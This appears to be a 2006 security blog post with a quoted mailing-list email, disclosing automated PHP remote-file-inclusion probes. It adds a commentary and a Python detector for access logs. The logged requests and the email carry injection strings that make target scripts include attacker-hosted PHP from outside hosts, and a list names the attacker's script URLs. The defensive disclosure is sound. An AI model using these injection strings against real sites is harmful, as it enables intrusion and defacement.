File Include Brute-Force Attacks
I came across this email on webappsec.
For the most part I ignore the dozens of daily attacks against my system but this one caught my eye. Looks like some defacing groups are writing/implementing perl scripts to identify query strings, and attempt php inclusion attacks against them (not using known exploits). Below is a log snippet.

202.226.224.67 - - [08/Jan/2006:21:32:43 -0500] "GET / HTTP/1.0" 200 37172 "-" "lwp-trivial/1.35"
202.226.224.67 - - [08/Jan/2006:21:32:44 -0500] "GET /?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 37172 "-" "lwp-trivial/1.35"
202.226.224.67 - - [08/Jan/2006:21:32:45 -0500] "GET /webservers/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 24083 "-" "lwp-trivial/1.35"
202.226.224.67 - - [08/Jan/2006:21:32:46 -0500] "GET /phishing/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 30626 "-" "lwp-trivial/1.35"
202.226.224.67 - - [08/Jan/2006:21:32:47 -0500] "GET /database/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 24267 "-" "lwp-trivial/1.35"
202.226.224.67 - - [08/Jan/2006:21:32:48 -0500] "GET /appservers/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 24521 "-" "lwp-trivial/1.35"
202.226.224.67 - - [08/Jan/2006:21:32:49 -0500] "GET //lib/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 47471 "-" "lwp-trivial/1.35"
202.226.224.67 - - [08/Jan/2006:21:32:50 -0500] "GET /archive/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 25445 "-" "lwp-trivial/1.35"
202.226.224.67 - - [08/Jan/2006:21:32:51 -0500] "GET /development/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 24286 "-" "lwp-trivial/1.35"
202.226.224.67 - - [08/Jan/2006:21:32:52 -0500] "GET /ws/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 29316 "-" "lwp-trivial/1.35"
202.226.224.67 - - [08/Jan/2006:21:32:53 -0500] "GET //pen-test/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 29892 "-" "lwp-trivial/1.35"
202.226.224.67 - - [08/Jan/2006:21:32:54 -0500] "GET /ajax/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 28338 "-" "lwp-trivial/1.35"
202.226.224.67 - - [08/Jan/2006:21:32:55 -0500] "GET /appfirewall/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 24073 "-" "lwp-trivial/1.35"

The script located at www.sanicentrum.be might interest some of you, as well as the include file it uses at http://www.sanicentrum.be/private/therules25.dot and the many scripts it uses/looks for.

Working Referenced Links
* http://www.sanicentrum.be/private/tool25.dot
* http://www.sanicentrum.be/private/writer25.dot
* http://www.sanicentrum.be/private/get25.dot
* http://www.sanicentrum.be/private/filed25.dot
* http://www.sanicentrum.be/private/filed_put25.dot (Of Interest)
* http://www.sanicentrum.be/private/copyd25.dot
* http://www.sanicentrum.be/private/flist25.dot
* http://www.sanicentrum.be/private/style25.dot (Because every defacement group needs html templating :)

Non working (at this time)
* http://www.sanicentrum.be/private/safe25.dot

I've contacted sans since the parent host *appears* to be hacked.
- Robert
http://www.cgisecurity.com/ Website Security News, and more!
http://www.cgisecurity.com/index.rss [RSS Feed]
A Perl script seems to be probing PHP scripts for file-include bugs by brute force. When I checked, the same kind of access log entries were present on my own server as well. The tool appears to work by extracting the links on the top page, rewriting the query-string portion of each one, and trying it. The attack PHP script has since been deleted and is no longer accessible.
Although it does not help much once script injection is already possible, setting allow_url_fopen=off would protect you from this particular attack even if a script-include bug did slip through.
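The probe pattern above (a full URL passed as a query parameter, paired with a `cmd` parameter, from `lwp-trivial`) is easy to pick out of an access log. The following detector is an added example, not code from the original post or from the quoted emails; the sample log is constructed from two lines quoted above plus one benign request, and the Apache combined-log regex is an assumption about the log format.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample: two lines from the access log quoted above plus one benign request.
SAMPLE_LOG = """\
202.226.224.67 - - [08/Jan/2006:21:32:43 -0500] "GET / HTTP/1.0" 200 37172 "-" "lwp-trivial/1.35"
202.226.224.67 - - [08/Jan/2006:21:32:44 -0500] "GET /?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 37172 "-" "lwp-trivial/1.35"
10.0.0.5 - - [08/Jan/2006:21:40:01 -0500] "GET /archive/?ref=2006-01&page=2 HTTP/1.0" 200 25445 "http://example.org/" "Mozilla/5.0"
"""

# Apache "combined" log format (assumed): client, ident, user, timestamp,
# request line, status, size, referer, user agent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
# A parameter value that is itself an absolute URL is the signature of a
# remote-file-inclusion probe (the target script is told to include a URL).
URL_VALUE_RE = re.compile(r'^(https?|ftp)://', re.IGNORECASE)


def query_params(target):
    """Decoded (name, value) pairs of the request target's query string."""
    return parse_qsl(urlsplit(target).query, keep_blank_values=True)


def rfi_params(target):
    """Names of query parameters whose value is an absolute URL."""
    return [name for name, value in query_params(target) if URL_VALUE_RE.match(value)]


def scan_access_log(text):
    """Return one finding per request that passes a URL in a query parameter.

    Each finding records the client, the path hit, which parameters carried a
    URL, whether a companion 'cmd' parameter was present, and the user agent.
    """
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        params = rfi_params(m['target'])
        if not params:
            continue
        names = {name for name, _ in query_params(m['target'])}
        findings.append({
            'ip': m['ip'],
            'path': urlsplit(m['target']).path,
            'url_params': params,
            'has_cmd': 'cmd' in names,
            'ua': m['ua'],
        })
    return findings
```

Note that the probe lines return 200 with the same byte count as the plain `GET /`, so a 200 here only shows the page ignored the parameter, not that the include succeeded; comparing the size against the baseline request is the quickest sanity check.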
1 comment
From full-disclosure.
Hello
We got hit by what looks like a bot
trying to inject PHP.Chaploit in our sites
Host is in 202.226.224.*
User-Agent : lwp-trivial/1.35
the bot hit one of our dynamic pages (ASP)
trying to inject the PHP script located on
http://www.foxcf.hpgvip.com.br/cse.gif
Full URL was
ourpage.asp?ID=ID=http://www.foxcf.hpgvip.com.br/cse.gif?&cmd=cat%20bugado
obviously trying to inject PHP in ASP isn't a good idea,
that's what makes me think this is an automated (and dumb) attack
Virustotal says :
AntiVir 6.33.0.75 01.09.2006 Linux/Rootkit
Avast 4.6.695.0 01.09.2006 PHP:Chaploit
Avira 6.33.0.75 01.09.2006 Linux/Rootkit
DrWeb 4.33 01.09.2006 PHP.Chaploit
Kaspersky 4.0.2.24 01.09.2006 Exploit.PHP.e
McAfee 4669 01.06.2006 PHP/Chaploit
(others didn't detect anything)
I also advised sysadmin of the web server hosting this
file.
I just wanted to share this information with the community
have a nice day
Maxime Ducharme